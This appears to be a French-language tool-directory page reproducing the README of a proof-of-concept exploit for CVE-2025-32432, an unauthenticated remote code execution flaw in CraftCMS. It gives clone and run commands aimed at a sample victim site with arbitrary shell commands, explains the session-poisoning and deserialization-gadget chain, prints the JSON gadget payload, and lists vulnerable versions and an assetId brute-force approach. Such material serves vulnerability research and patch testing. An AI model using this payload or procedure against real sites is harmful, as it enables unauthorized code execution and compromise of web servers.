Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32432-PoC — Exploit Python pour CVE-2025-32432, une RCE sans authentification dans le point de terminaison asset-transform de CraftCMS. Inclut une chaîne de deux paquets pour exécuter des commandes shell arbitraires via des gadgets de désérialisation. | Kitploit
Outils/GitHubGitHub/cty-research-1/cve-2025-32432-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubcty-research-1/cve-2025-32432-poc

CVE-2025-32432-PoC

Exploit Python pour CVE-2025-32432, une RCE sans authentification dans le point de terminaison asset-transform de CraftCMS. Inclut une chaîne de deux paquets pour exécuter des commandes shell arbitraires via des gadgets de désérialisation.

Voir le dépôt
641il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Scripts d'exploitation CVE-2025-32432 (PoC Python)

Exécution de code à distance sans authentification pour CraftCMS 3.x / 4.x / 5.x
Mainteneur du PoC : C.T.Y. (usage recherche uniquement)
Découverte de la vulnérabilité : Nicolas Bourras – Orange Cyberdefense
Inspiration supplémentaire pour le PoC : Recherche SensePost & script public de Chirag Artani


1. Aperçu

Ce dépôt regroupe deux scripts d'exploitation Python complémentaires pour CVE-2025-32432 — une RCE sans authentification dans le point de terminaison de transformation d'actifs de CraftCMS.

ScriptObjectif
craftcms_rce_php_check.pySon de sécurité — envoie une requête en utilisant le gadget FnStream pour vérifier si du PHP arbitraire s'exécute (affiche la sortie de phpinfo()). Idéal pour une confirmation à faible impact.
craftcms_final_payload.pyExploitation complète — chaîne en deux paquets : d'abord implante du PHP via FnStream, puis utilise le gadget FieldLayoutBehavior → PhpManager pour exécuter n'importe quelle commande shell.

Le deuxième script est celui décrit tout au long de ce README.
Le premier script est inclus pour complétude et validation rapide, grâce à Chirag Artani — voir Crédits.
Le nom du script a été adapté pour plus de clarté ; structure et idée originales par Chirag Artani.


2. Avertissement 🚨

Pour usage éducatif et tests de sécurité autorisés uniquement.
Utiliser ces scripts contre des systèmes sans autorisation écrite explicite est illégal et contraire à l'éthique.


3. Fonctionnalités (payload final)

  • RCE en deux paquets en une seule exécution
  • Force brute automatique de assetId (heuristique 404 → 302)
  • Exécution de commande personnalisée (-c/--cmd)
  • Fonctionne sur HTTP ou HTTPS (avertissements de vérification SSL supprimés)
  • Extraction propre de la sortie de commande depuis la réponse HTML

4. Prérequis

  • Python 3.8+
  • Paquets PyPI (installation via pip install -r requirements.txt) :
    • requests
    • urllib3

5. Installation

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/CTY-Research-1//CVE-2025-32432-2pkt.git
cd CVE-2025-32432-2pkt

# Installer les dépendances
pip install -r requirements.txt

6. Utilisation

6.1 Vérification rapide d'exécution PHP

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://victime.com

Si vous voyez la sortie de phpinfo(), la cible est très probablement exploitable.

6.2 Exploitation complète en deux paquets

root@kitploit:~
python3 craftcms_final_payload.py -u https://victime.com -c "id"

Options

OptionForme longueDescriptionRequis
-u--urlURL de base de la cible (sans slash final)✅
-c--cmdCommande shell à exécuter✅
-a--assetassetId connu valide❌
-s--scan-maxLimite de force brute (défaut: 300)❌

7. Fonctionnement de la vulnérabilité (récapitulatif)

  • Empoisonnement de session — GET vers /index.php?p=admin/dashboard&a=<?=...?> écrit du PHP arbitraire dans /tmp/sess_<ID>.
  • Gadget de désérialisation — POST vers actions/assets/generate-transform avec un gadget FieldLayoutBehavior → PhpManager force CraftCMS à faire un require() du fichier de session, exécutant ainsi le code.
root@kitploit:~
{
  "assetId": 11,
  "handle": {
    "width": 1,
    "height": 1,
    "as hack": {
      "class": "craft\\behaviors\\FieldLayoutBehavior",
      "__class": "yii\\rbac\\PhpManager",
      "__construct()": [
        {
          "itemFile": "/tmp/sess_<SessionID>"
        }
      ]
    }
  }
}

8. Versions testées

  • CraftCMS < 3.9.15 (nécessite force brute de assetId)
  • CraftCMS < 4.14.15
  • CraftCMS < 5.6.17

9. Références et lectures complémentaires

  • Avis original — Nicolas Bourras / Orange Cyberdefense
  • Article approfondi de SensePost
  • PoC de Chirag Artani
  • Avis de sécurité CraftCMS
  • CVE-2025-32432 @ MITRE

10. Crédits

  • C.T.Y. — PoC complet en deux paquets et documentation
  • Chirag Artani — Script de vérification phpinfo original (craftcms_rce_php_check.py) et idées de recherche précoces Le nom du script a été adapté pour plus de clarté ; structure et idée originales par Chirag Artani.
  • Nicolas Bourras / Orange Cyberdefense — Découverte de la vulnérabilité et divulgation responsable
  • Contributions supplémentaires de l'équipe de recherche SensePost

11. Licence

Avis de responsabilité : Tout risque juridique ou dommage découlant de l'utilisation de ce code relève de la seule responsabilité de l'utilisateur.

Licence MIT — voir LICENSE.


說明中文

1. 專案內容

檔案用途
craftcms_rce_php_check.pyVérification de faisabilité d'exécution PHP : une seule requête, utilisant FnStream pour déclencher phpinfo(), afin de confirmer à faible impact si la cible est vulnérable.
Ce nom de fichier a été adapté pour plus de clarté ; le concept et la structure originaux sont de Chirag Artani.
craftcms_final_payload.pyExploitation complète en deux paquets : d'abord implante du PHP via FnStream, puis exécute des commandes arbitraires via PhpManager.

2. 免責聲明

Usage réservé à l'enseignement et aux tests de sécurité autorisés. Toute opération non autorisée est illégale.


3. Vérification rapide

root@kitploit:~
python3 craftcms_rce_php_check.py -u https://cible

4. Exploitation complète

root@kitploit:~
python3 craftcms_final_payload.py -u https://cible -c "id"

Les paramètres sont identiques à la version anglaise.


5. Remerciements

  • Chirag Artani — Script de vérification phpinfo Ce nom de fichier a été adapté pour plus de clarté ; le concept et la structure originaux sont de Chirag Artani.
  • Nicolas Bourras / Orange Cyberdefense — Découverte de la vulnérabilité et inspiration technique
  • SensePost — Inspiration technique

6. Licence

Toute responsabilité légale ou perte découlant de l'utilisation de ce code incombe à l'utilisateur.

Licence MIT

Télécharger l’outil